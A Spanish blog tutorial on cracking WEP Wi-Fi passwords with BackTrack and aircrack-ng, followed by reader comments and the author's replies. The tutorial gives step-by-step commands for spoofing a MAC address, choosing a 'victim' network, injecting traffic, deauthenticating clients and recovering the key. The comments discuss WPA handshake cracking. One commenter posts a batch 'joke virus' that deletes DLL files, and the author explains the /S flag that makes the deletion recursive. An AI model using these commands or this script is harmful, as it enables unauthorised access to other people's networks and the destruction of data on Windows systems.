Bueno, para empezar este tutorial ha sido creado con un propósito educativo. Lo que el usuario haga con lo aprendido en este tutorial, lo hará bajo su responsabilidad.
¿Para que nos puede servir saber crackear una contraseña de encriptación WEP? Eso no importa, esto es meramente educativo y un reto para algunos. Bueno es una tecnica que se utiliza en algunas empresas para realizar auditorías de seguridad en redes wifi. También sirve para demostrar lo frágil que es la seguridad que nuestros proveedores de Internet dejan configurada en los routers que nos regalan.
Antes que nada hay que saber cuanto es de segura la encriptación WEP. Segun Wikipedia:
{WEP, acrónimo de Wired Equivalent Privacy o «Privacidad Equivalente a Cableado», es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits del IV). Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada.}
Para este ejercicio necesitaremos “BackTrack”, que es un sistema operativo con kernel de Linux que se utiliza exclusivamente para auditorías de seguridad. No es necesario instalarlo ya que es un LiveDVD.
- Lo primero que hay que hacer es descargar la última versión de “BackTrack” y grabarla en un DVD. Después de comprobar que se ha grabado correctamente, con el DVD en la unidad reiniciamos el equipo para arrancar desde el LiveDVD. En algunos casos puede ser necesario cambiar el orden de los dispositivos de arranque en el BIOS.
- Si todo es correcto nos saldrá el menú del LiveDVD, donde debemos elegir la opción indicada en la foto. Si durante el proceso de arranque hay algún fallo, deberá reiniciar el equipo e intentar una por una las siguientes opciones de la lista hasta encontrar una que le permita llegar al siguiente paso.
- Llegados a este punto debemos iniciar la interfaz gráfica. Para ello utilizaremos el comando:
startx
- Con la interfaz gráfica cargada, primero tendrá que configurar el teclado. El sistema operativo de este LiveDVD está en inglés. Haga clic de derecha con el ratón sobre la bandera de “US” >> elige la opción “Configure…” >> en la ventana que se abre, elimina todos las banderas que aparecen en “Active layouts:”, >> después añade la bandera que corresponde a la configuración de tu teclado de entre las que están en “Available layouts:” y confirma con [OK]. Lo segundo de este paso será abrir la consola de comandos haciendo clic en el segundo icono.
- Este es el paso donde se empieza el proceso de recuperación de contraseña. Todo el proceso lo realizaremos en la consola que hemos abierto en el paso anterior. Con el siguiente comando averiguaremos si nuestra tarjeta de red wifi está compatible con “BackTrack”. Si el sistema reconoce tu interfaz wifi, te mostrará algo como eth1 o wlan0. Este es el nombre de la interfaz y lo deberá utilizar en todos los comandos que sigan.
airmon-ng
- Los siguientes 2 comandos desactivarán la interfaz wifi preparándola para el siguiente paso. Hay que ejecutarlos uno detrás del otro sin olvidar remplazar “(interface)” por el nombre de la interfaz obtenido en el paso anterior.
Ej: “airmon-ng stop eth1”airmon-ng stop (interface) ifconfig (interface) down
- Como todo buen hacker informático, debes cuidar la seguridad así que cambiaremos la mac del dispositivo. La mac esta formada por 6 grupos de 2 digitos separados por “:”. Los caracteres permitidos son “0123456789ABCDEF”.
macchanger --mac 00:11:22:33:44:55 (interface)
- Volvemos a activar la interfaz:
ifconfig (interface) up airmon-ng start (interface)
- Ahora revisaremos todas las redes wifi con encriptación WEP, disponibles. Entre ellas tenemos que elegir a la que queremos atacar:
airodump-ng (interface) --encrypt wep
Despues de ver la lista y elegir a nuestra victima pararemos el proceso con la combinación de teclas [Ctrl]+[C].
- Abriremos una nueva pestaña presionando en el icono que aparece en la esquina izquierda abajo en nuestra consola.
- Utilizando la información recompilada en el paso 9, iremos componiendo el siguiente comando:
airodump-ng (interface) --bssid (bssid) -c (channel) -w (captura)
Se deben remplazar los siguientes parámetros:
(interface) es el nombre de la interfaz que obtuvimos en el paso 5. Ej. eth0, wlan1, …
(bssid) es la mac o bssid del router que queremos atacar. Ej: 00:13:49:CA:FE:00.
(captura) es el nombre de archivo en el que se guardará la información capturada. Yo suelo utilizar la essid, así me es mas fácil recordar que información contiene.El router que elegimos en este paso es de vital importancia. Si no tenemos que descifrar una señal concreta, lo ideal sería elegir la bssid que mas tráfico de datos tenga. Si encontramos una que tenga suficiente tráfico de datos para que no tengamos que inyectar tráfico falso, nos podríamos saltar los siguientes 3 pasos.**
- **Si es una de las que tienen tráfico, pero muy poco, debemos inyectar tráfico falso. Para ello abrimos una nueva pestaña y en ella ponemos el siguiente comando.
aireplay-ng (interface) -3 –b (bssid) -h (MacCliente)
La (interface) y la (bssid) ya sabes con que hay que remplazarlas. La (MacCliente) es la dirección Mac en formato XX:XX:XX:XX:XX:XX del cliente que este generando el tráfico. Este proceso captura partes del tráfico que este cliente realiza y lo vuelve a enviar al router como si viniera del mismo cliente. Esto aumentará la velocidad con la que se capturan los paquetes. En definitiva, nos ahorrará tiempo. Si con esto ya tenemos suficiente tráfico de datos, nos podemos saltar los siguientes 2 pasos.
- **Si hemos decidido hacer todo esto en un punto de acceso que no tiene tráfico, además de todos los pasos anteriores, debemos realizar también este y el siguiente paso. Abrimos una nueva pestaña como hemos visto en el paso 10. En ella ponemos el siguiente comando:
aireplay-ng (interface) -1 10 -a (bssid)
Este comando enviará 10 paquetes malformados al router haciéndole creer que somos un cliente que ya esta autentificado. Al pensar que somos un cliente autentificado el router nos enviará un paquete con datos encriptados. Este será el paquete que capturaremos con el paso anterior. He de tener en cuenta que en este caso nosotros seriamos el cliente, por lo tanto el valor del (MacCliente) seria nuestra mac. La que definimos en el paso 7. Ej: 00:11:22:33:44:55
- **Mientras se ejecutan los comandos anteriores, abrimos una nueva pestaña como hemos visto en el paso 10. En ella ponemos el siguiente comando:
aireplay-ng (interface) -0 0 -a (bssid) –c (MacCliente)
Este paquete malformado provocará que el router nos desautentifique, permitiendo así que el proceso anterior vuelva a autentificarnos generando otro paquete de datos.
- En este momento volvemos a la pestaña numero 2, que es en la que se captura en tráfico y comprobamos cuantos paquetes tenemos capturados y si se sigue capturando. He de tener en cuenta que para descifrar una clave wep de 64bits se necesitan unos 40000 paquetes capturados, y para una de 128bits unos 80000. Esto es lo recomendado lo que no impide que el siguiente comando consiga descifrarla antes. Así que abrimos una última pestaña y en ella ponemos:
aircrack-ng (captura)*.cap
No olviden remplazar la variable (captura) con la que definimos en el paso 11 seguido de “*.cap”. Ej: wlan_xx*.cap. Este proceso empezara a escanear los paquetes que hemos capturado en busca de la clave. El proceso se repite automáticamente cada 5000 paquetes capturados, así que si con 5000 paquetes no encuentra la clave cuando la captura de paquetes llegue a 10000 volverá a buscar, luego a los 15000, 20000, …hasta encontrarla. Lo único que hará falta es esperar.
- Tras esperar un rato, en la ultima pestaña que hemos abierto aparecerán dos mensajes “KEY FOUND!” + “Decrypted correctly: 100%”. Esto significa que ya tenemos nuestra clave. La clave que nos abrirá las puertas de nuestro punto de acceso es la que aparece donde pone ASCII.
Me quedo atascado en el punto 9 pongo
airodump-ng wlan0 –encrypt wep
y me pone
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) – expect AROHRD_IEEE80211, Etc
Alguien sabe a que puede ser debido
————–
LenoID_Admins dice: Se ha planteado que tal vez el hardware wifi que utilizas no este compatible con el modo monitor ? http://www.backtrack-linux.org/forums/hardware-compatibility-list/
Tengo un problema, al intentar hacer airodump-ng (interface) –encrypt wep obtengo esto
ioctl(SIOCSIWMODE) failed: Operation not supported
ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start eth0 ‘
Sysfs injection support was not found either.
por cierto, se me olvidaba decir que utilizo airodump en kubuntu 10.04 a 64 bits
si alguien me puede ayudar agradecería de todo corazón.
Respuesta:
Puedes ponerme todos los comandos que ejecutas desde que abres el terminal, hasta llegar a ese error? Tengo la impresión que no especificas bien la interfaz, o especificas una que no es WIFI o una que no es compatible.
la ventana final sale bien, me dice «key found» pero no sale el asci, q me faltara?
Respuesta: Si pone que ha encontrado la key, tiene que mostrarla. Al menos en HEXADECIMAL. Si no lo consigues y quieres que le eche un vistazo me tienes que un enlace de donde pueda descargar el fichero .cap para probarlo.
Hola amigo, cuando hago el paso 9 y introduzco
airodump-ng wlan0 –encrypt wep ,me sale:
ioctl(SIOCSIWMODE) failed:Device or resoruce busy
ARP linktype is set to 1 (eternet) – expected ARPHRD_IEEE80211,ARPHRD_IEEE80211_full OR ARPHRD_IEEE80211_PRISM instead.
Make sure RFMON is enabled: run `airmon-ng start wlan0
Sysfs injection support was not found either.
Me podrias decir, que hago mal?
y si mi wifi no es compatible, recomendarme una, la mia es Intel wifi link 5100 AGN.
Muchas gracias, por anticipado amigo, un saludo.
Respuesta: En primer lugar, en el comando que mencionas, hay 2 “-” antes de encrypt, no solo uno. Leyendo el error que me has puesto puedo deducir que, o la interfaz correcta no es wlan0, o no esta puesta correctamente en “Modo Monitor”, o en el peor de los casos tu WIFI no es compatible con el modo monitor.
Desconozco si el “Intel WIFI Link 5100 AGN” es o no compatible con el modo monitor. Hay muchos modelos compatibles, y entre ellos las que mas me han recomendado son las que llevan chipset “RealTek 8187L”.
Me he comprado una con el chip 8187l realtek, pero me sigue dando el mismo error, en cuanto a lo de las ¨–¨ pongo los dos.
Saludos
Respuesta: no se, algo debes de hacer mal. yo tengo esta y me funciona muy bien. http://www.alfa.com.tw/in/front/bin/ptdetail.phtml?Part=AWUS036H&Category=105463
¿puede ser que este algo mal en el paso 9, alguna letra del comando?
http://www.alfa.com.tw/in/front/bin/ptdetail.phtml?Part=AWUS036H&Category=105463
Esa es justo la que yo he comprado.
gracias
Respuesta: Esta misma la utilizo yo, y a mi me funciona. No sabría decirle.
¿la tageta wifi hay que instalar drivers en back track?
Cuando la uso en windows con los drivers instalados la luz del Alfa se enciende.
Encambio cuando la uso en back track no
Gracias anticipadas
Respuesta: Si te la reconoce y le funciona bien, que no se encienda la lucecita esa no significa absolutamente nada.
hola, lo primero 1000 gracias por el tuto, esta muy bien explicado.
el problema que tengo es q me ha pasado lo mismo q al compi, me pone key found 100% pero no me sale nada de ascii ni na.
que puede ser???
gracias
Respuesta: Si no te aparece en ASCI, puede que la clave este en HEXADECIMAL. En este caso de ser necesario lo podrías convertir con esta herramienta: http://lenoid.net/2010/02/encripta-tus-mensajes-con-%E2%80%9Ctranslator-binary%E2%80%9D/
Si no aparece ni siquiera en HEXADECIMAL, tendrás que hacer una captura de pantalla, o una foto con suficiente resolución (con cámara digital), y luego me la pasas por el formulario de contacto. Así tal vez pueda decirte algo más.
1. Mira quiero hacer eso, pero mi tarjeta inalambrica USB sera compatible con el Backtrack, la tarjeta es: TP-link; TL-wn821n
2. Y me falto otra cosa, este metodo tambien decifra las claves WPA?
Respuesta:
1. Abres un terminal, escribe y ejecuta el comando dmesg, conecta el usb, y vuelve a ejecutarlo. si lo reconoce, te aparecerá la marca el modelo, … También puedes verlo con el comando iwconfig, que muestra todos los adaptores wifi conectados y reconocidos.
2. No, para WPA y WPA2 es necesario capturar otro tipo de paquetes.
Entonces tu no sabrás de otro metodo para hackear las claves WPA??
Respuesta: Se que paquetes de necesita, y como hay que capturarlos, pero aun no he tenido tiempo para postearlo. También hay que tener en cuenta que con las herramientas actuales reventar la encriptacion de una WPA sin el diccionario adecuado, puede llevarte años. En cambio en una WEP si es de las que ya se conoce la formula para crear un diccionario como ADSLXXXX, DLINK, ONO_XXXX, SpeedtouchXXXXXX, JazzTel_XX, YaComXXXXXX, D-LINK WIRELESS, p1xxxxxxx000x, R-wlanxx, PERSONAL, capturando solo 4 paquetes ya lo tienes descifrada. Y esto lo puedes conseguir en 5 min.
Osea q lo q vos queres decir es q con ninguna de esas herramientas se puede y tocaria con un diccionario diferente, pero existen tales diccionarios para romper la ecriptacion WPA o aun no lo han creado?
Respuesta:Me refiero a que si lo intentas por FUERZA BRUTA puedes tardar años. En cambio si conoces la formula con la que esta creada la contraseña, puedes crear un diccionario para este caso concreto. O con mucha suerte, algún diccionario que encuentres por Internet, pueda servir. De esto depende lo mucho o poco que tardes en desencriptar la contraseña.
Usted me había comentado anteriormente q sabia q paquetes capturar, osea q usted ya conoce la formula o tiene algún diccionario para esta encriptacion
Responder:No se si entiendo bien tu pregunta, espero que te refieras a los WPAs! En una WEP vale con capturar trafico normal, en cambio para las WPA se tiene que capturar el «handshake». El handshake solo se envia cuando se establece la conexion entre el router y el equipo cliente. Despues, ya no se vuelve a enviar hasta que otro cliente se conecte.
si claro me refiero a los WPAs, ud ya sabe como decifrar las contraseñas? o solo tiene la idea de hacer el desencriptado de los WPA pero no lo ha hecho
Responder:Si, lo he hecho! Pero siempre con diccionarios. Con fuerza bruta me hubiera tardado como minimo, años. Yo hice un curso de «Seguridad AntiHacking» y allí hemos hecho muchas pruebas y he aprendido algunos trucos.
Ud no podria Postear por lo menos un diccionario para WPA, es q la verdad lo necesito y no encuentro en otro lado y se me hace muy dificil a fuerza bruta.
Respuesta: No. Y aun que lo haría, seguramente no te serviría. Los diccionarios se generan utilizando ciertas formulas matemáticas, y siempre en base al ESSID y BSSID del punto de acceso. Por lo tanto supongo que queda explicado porque no sirve. Para probar algún diccionario, prueba buscar en google «Free Rainbow Tables».
Hola. El tutorial está muy bien explicado. Tengo el mismo problema que Santi en el paso 9.
Donde me tiene que poner «monitor mode enabled» me pone «monitor mode enabled on mon0» (en el paso anterior)
¿Pudiera ser esto lo que me diese problemas?
¿Puedo solucionarlo?
Respuesta: El comando «airmon-ng start (interface)» activa el modo monitor en tu interfaz wifi. El modo monitor se puede activar en la misma interfaz, ej wlan0, eth1… o en una interfaz virtual como mon0. Si a ti te aparece el mensaje «monitor mode enabled on mon0» antes de ejecutar este comando, esto significa que el modo monitor ya esta activo asi que no es necesario ejecutar ese comando. Sea como sea si tu modo monitor no se activa en la misma interfaz como es el caso del ejemplo que puse en el tutorial y se activa en una interfaz virtual como «mon0», apartir de ese momento deberás utilizar esa interfaz virtual para realizar lis demás pasos. Espero que te sirva esta información!
La verdad, estoy muy agradecida por tu ayuda.
Cuando despues del paso 8. Me dice lo de «monitor mode enabled on mon0», ¿como accedo a la interfaz virtual para seguir con los demás pasos?
Gracias anticipadas por tu paciencia. Me haria mucha ilusión lograrlo por fin.
Respuesta: La interfaz wifi normalmente tiene nombres como wlan0, wlan1, eth0 o eth1 entre otros. En el ejemplo que tienes en el tutorial, el interfaz que se utiliza es el eth1. En ese caso el modo monitor no crea una interfaz virtual, sino que cambia la interfaz original «eth1» a modo monitor. Por eso los pasos siguientes siguen utilizando la misma interfaz. En su caso, como la interfaz para modo monitor es virtual bajo el nombre «mon0», desde el momento en el que aparece el mensaje de «monitor mode enabled on mon0» tendra que seguir con el paso 9, pero utilizando como interfaz «mon0». Ej: airodump-ng mon0 –encrypt wep
Hola:
Sigo avanzando, pero que ocurre si el bssid de mi victima pone not «associated»?
¿Deberia escribir esto?
Respuesta: Es que no me queda muy claro a que te refieres. Puedes enviarme alguna foto? puedes subirla aquí y dejarme el enlace: http://imageshack.us/ .
Otra cosa que creo que deberías saber es que dependiendo de su marca y modelo de su interfaz wifi y su capacidad de injectar paquetes, los pasos 12-14 te funcionen o no. Esos pasos son necesarios solo cuando el router que estas comprobando no tiene ningún cliente conectado por wifi o el cliente que tiene ni genera suficiente trafico.
El paso 9 esta allí justo para esto, para ver que router tiene mas trafico ya que ese es el que será mas fácil y rápido de descodificar. En lo que te aparece en el paso 9, la pantalla esta repartida en 2 zonas: la parte de arriba te muestra los routers a tu alcance, y la parte de abajo te muestra los clientes que están generando trafico. En la parte de abajo tienes que mirar cual de los que aparecen allí tienen mas movimiento en donde pone «Packets». El que mas movimiento tenga es el que mas posibilidades tienes de sacarle la contraseña.
Cuando lo has identificado, miras al principio de esa linea, en donde pone BSSID, y allí tienes la mac del router. Coges esa mac y la buscas en la parte de arriba para identificar el router y sus características. Y ahora pasas al siguiente paso con esas características.
Tutorial 10, en todos los aspectos.
Desde que le dí al comando
aircrack-ng (captura)*.capçhan pasado 17 horas.
Voy por los 80000, cada 5000 me indica que de a
aircrack-ng (captura)*.cap
Me parece mucho tiempo…
Jesete50
Atentamente.
Respuesta: Bueno, No se si solo es mi impresión o es que no te has dado cuenta de que todas las expresiones que están escritas entre paréntesis, tienes que substituirlas por otras cosas. Ej: (interface) la tienes que substituir por la interfaz que vas a utilizar, ….., y (captura) tiene que tener el mismo valor tanto en el paso 11 como en el paso 15.
Estas seguro que los 80000 paquetes son todos de la red que estas intentando reventar? Eso de 80000 es relativo, ya que en ocasiones te encuentra la pass con 15000 y otras veces no la encuentra hasta 180000 o mas. La mayoria de las veces antes de llegar a los 80000 ya lo encuentra. Que tardes mucho tiempo depende de si estas o no estas inyectando trafico, o de si el otro tiene el emule puesto o no, ….. Si este se pone a descargar algo de internet puede que en 5 minutos tengas mas de 100000 paq. Pero si ese no genera suficiente trafico y tu ordenador no es capaz de inyectar trafico, te tocara esperar lo que haga falta.
Un truco que puedes utilizar es: Capturas hoy lo que puedes. Paras el airodump-ng te pasas todos los ficheros que acaban en «.cap» del escritorio a una memoria usb. Mañana vuelves a intentar capturar, pero antes de empezar vuelves a copiar los ficheros del usb al escritorio. Esto hará que los paq que captures la segunda ves se sumen a los del día anterior, y así todos los días hasta tener suficientes paq para conseguirlo. Una cosa que tienes que tener en cuenta es que en este caso, el paso 15 tiene esta forma exacta: «aircrack-ng *.cap» sin los » por supuesto. al no especificar el nombre del fichero aircrack-ng suma el contenido de todos los ficheros «.cap». Si has escaseado distintas redes te aparecerá una lista con todas pidiendo que elijas la que quieres crackear. Simplemente escribes abajo el numero que tiene delante en la lista esa red y le das al intro.
Espero que esto te ayude a ti y a todos los que tengan las mismas dudas que tu. (Solo para tu caso, si no lo consigues, comprime con winrar los ficheros .cap y envienmelos utilizando el formulario de contacto y te los miro yo para ver que encuentro.)
Feliz 2011!!!
Hola. Muy bien, gran tutorial, me funciono perfecto, creo que explicas paso a paso de una manera muy clara. Te lo agradezco.
Veo en tus comentarios que sabes como atacar WPA, ¿es posible que subas un tutorial como este sobre ese tipo de ataques?
Saludos
Respuesta: Esta en mis proyectos de futuro, pero por el momento me es imposible. La diferencia es que para WPA se captura otro tipo de paquetes, y por el momento solo se puede reventar a base de diccionarios.
antes k nada felicidades por el tutorial es el mejor k e visto asta ahora se entiende a la perfeccion, pero tengo una duda:
yo tengo un pc de sobre mesa sin wifi,m compre uno inalambrico, inicio normalmente el programa, meto el cd reinicio el pc y me sale el programa, para k me reconosca el wifi inalambrico e visto en un comentario anterior k tengo k ejecutar el comando dmesg, cuando lo hago me dise:
USB 1-8 ESTAN DESCONECTADO POR LO K NO ME LO RECONOCE K HAGO
GRACIAS POR ADELANTADO
Respuesta: Puede que BackTrack no tenga controladores para ese hardware. Si es esto, una solución podría ser bajarte la ultima versión de BackTrack:
http://lenoid.net/2010/01/backtrack-4-final/
Otra cosa a tener en cuenta es que para que un wifi usb sirva para realizar auditoria de seguridad wifi, tiene que tener un chip especial. El que mas he utilizado, y te recomiendo es el chip RTL8187L.
Antes de nada muchas gracias por el tutorial. A veces llega a capturar 1.5 Gb en paquetes y me sale un mensaje del tipo ha llegado a máximo tamaño del disco duro. Sin embargo en el PC tengo una distro de Ubuntu y un windows vista con bastantes gigas libres. Me gustaría poder instalar la distro del backtrack no en live CD. O aumentar su capacidad de disco. Muchas gracias.
Respuesta: Si no estoy equivocado, como el LiveCD no toca nada del disco duro, el único lugar donde podría guardar lo que capturas seria en la memoria RAM. Así que ese espacio depende de cuanta memoria RAM libre se queda después de arrancar el BackTrack! Borrar cosas del LiveDVD no te va a servir de absolutamente nada.
Una solucion que se me ocure en este momento, seria montar una de las particiones de tu equipo (o un memory stick usb), y cuando haces la captura poner que el fichero se guarde dentro de ese punto de montaje.
En tu caso, te recomiendo que en lugar de Ubuntu te instales el BackTrack. Y si quieres tener instalado el Ubuntu también te lo instales desde Windows utilizando el sistema WUBI.
He probado el truco de guardar las capturas en una usb, pero a veces me quedo sin espacio en disco y no se como puedo aumentarlo siendo un live cd. ¿que puedo borrar? o ¿como puedo aumentar el espacio en la sesión?
Muchísimas gracias. Va de lujo.
Respuesta: Si no estoy equivocado, como el LiveCD no toca nada del disco duro, el único lugar donde podría guardar lo que capturas seria en la memoria RAM. Así que ese espacio depende de cuanta memoria RAM libre se queda después de arrancar el BackTrack! Borrar cosas del LiveDVD no te va a servir de absolutamente nada.
Una solucion que se me ocure en este momento, seria montar una de las particiones de tu equipo (o un memory stick usb), y cuando haces la captura poner que el fichero se guarde dentro de ese punto de montaje.
hola mira he llegado al ultimo paso , pero llevo 15.000 y no la ha capturado y me pone : failed.next try with 5000 IVs. PERO cuando pasan 5000 no lo vuelve a intentar tengo que darle a ctrl+c y volver a poner airecrack …..etc en la ultima ventana.es normal o deberia de aserlo solo?
Respuesta: Eso deveria de buscar la clave automaticamente cada 5000 paquetes. Si no lo hace, significa que no pones el comando corecto, o utilizas una version con problemas.
Verás, lo hago todo bien, pero cuando me da la clave, resulta que és incorrecta $:
Respuesta: Eso es imposible! Si te muestra una contraceña, esa es la corecta ya que aircrack-ng comprueba la clave antes de mostrarla. No olvide que tiene que utilisar la clave ASCII no la HEXADECIMAL.
Si no funciona, significa que hay algo que no hace bien.
no es mas fácil si tienes el back track 4 aplicar #wepspoon ? saludos
Respuesta: La verdad es que no lose. Desconozco esa herramienta. Pero si tu la conoces, y te gusta escribir, tal vez queras escribir un post explicando los pasos ha seguir para hacerlo con esta herramienta. Estoy convencido que la comunidad te lo agradecería. Si el post está bien estructurado y con varias capturas de pantalla, yo estaré encantado de publicarlo.
el back track se podria ejecutar desde un USB?
si es así cuanto ocupa?
Respuesta: Si, se puede. El tamaño mínimo recomendado es de 8Gb. backtrack-4-usbpersistent-changesnessus
es que no puedo ejecutar el BT desde el USB
quando voy a la BIOS i en el boot pongo USB le doy a exit&save changes se me queda pensando i no arranca, vamos que es como si no detectara nada valido en el USB.
como lo arranco? seguro que es una chorrada pero soy novato i no se solo tengo 14 años
Respuesta:
Cual es el procedimiento que has seguido para instalar BT en el pendrive (indica todos los pasos)?
Que versión de BT estas intentando instalar en el pendrive?
Que capacidad tiene? Ej: 2Gb.
En la pagina oficial de BT, hay tutoriales y vídeo tutoriales que te enseña paso a paso como lo puedes hacer. Se recomienda como mínimo un pendrive de 8Gb. Si tras seguir los tutoriales que hay en la pagina oficial, y activar en la BIOS la opción de arrancar del dispositivo sigue sin funcionar, lo mas probable es que tu pendrive no sea capaz de arrancar. Esto significa que tendrías que probar con otros de marcas y modelos distintos. Hay algunos dispositivos que aunque lo hagas todo correcto, simplemente no son capaces de arrancar.
al arrancar el back track me pide login i al escribirlo i escribir la contraseña me dice que es incorrecto.
mi contrasenya tiene caracteres especiales ( ? * – )es posible que sea eso?
P:D: lo de antes ya lo arregle
Respuesta: Si has solucionado el problema anterior, no estaría mal que comentaras la solución por si alguien mas se encuentra con el mismo problema.
En cuanto a lo de la contraseña, es muy importante tener en cuenta el estado del «caps lock», y no olvides el mapa del teclado. Creo que por defecto esta en ingles, y si has definido la contraseña así y luego lo has cambiado, esto también puede afectar.
bueno mi problema anterior era simplemente que habia usado incorrectamente el unetbootin. es una tonteria pero si lo haces mal no va.
i a mi no me a pedido mapa de teclado me a pedido en un momento idioma pero era solo para la instalacion lo puse en español.
pero a mi no me a pedido mapa de teclado en ningun momento
Respuesta: Ha eso me refiero. Al momento en el que cambiaste el mapa del teclado de ingles (por defecto) a español. Si has definido la contraseña antes de cambiar el teclado a español, lo mas probable es que no hayas estado escribiendo lo que pensabas. Cuando cambias de ingles a español, las letras no cambian mucho de sitio, pero en cambio los símbolos cambian casi todos de sitio.
Prueba:
1. Usuario: root y contraseña: toor {estas son las que vienen por defecto en BackTrack}.
2. También puedes probar poner una contraseña sin símbolos y/o diacríticos.
no si es k yo no abia entrado antes en backtrack i no e podido cambiar ni el teclado ni el usuario o contraseña, probare lo del root toor porque yo no habia entrado antes en el linux
Respuesta: Para cambiar el idioma del teclado, tienes que hacer clic encima del icono con la bandera de USA que aparece en la barra, junto al reloj.
ya que estamos siendo ilegales crees que este virus funcionara?
@echo off
echo msgbox («el sistema no se a podido recuperar, pasando a modo de recuperación»),16,(«aviso del sistema») >> C:\jaja.vbs
echo @echo off >> C:\autoexec.bat
echo start C:\jaja.vbs >> C:\autoexec.bat
echo start color 0a >> C:\autoexec.bat
echo msg * pasando a modo de recuperación >> C:\autoexec.bat
echo del /f /q C:*.dll >> C:\autoexec.bat
echo :bucle >> C:\autoexec.bat
echo start color 0a >> C:\autoexec.bat
echo goto bucle >> C:\autoexec.bat
msg * «el sistema se ha trolleado i ahora tendrá que reiniciar»
shutdown -s -f -t 0
Respuesta: El código que has enviado no se puede definir como un virus. Más bien lo llamaría “Joke” o “Virus Joke” dado que lo único que es capaz de hacer es molestar abriendo algunos mensajes y consolas cmd. Tal y como esta escrito no produce ninguna perdida de datos (lo he comprobado en mi propio equipo). Basta con matar el proceso que abre las ventanas y los mensajes y ya esta.
El único comando peligroso en tu código es este “del /f /q C:*.dll” que se supone que va a borrar todos los ficheros “.dll” de la partición “C:”, pero dado que le falta un parámetro “/S” no es capaz de entrar en los subdirectorios para borrar, así que no pasa nada.
bueno esque eso era un joke que acaba jodiendo pero entonces que tengo que escribir del /f /s /q c:*.dll?
Respuesta: Si, pero «f, s y q» en mayúscula. lo puedes ver en el manual ejecutando «del /?».
Hi friends, how is the whole thing, and what you desire to say
on the topic of this post, in my view its really awesome in support of me.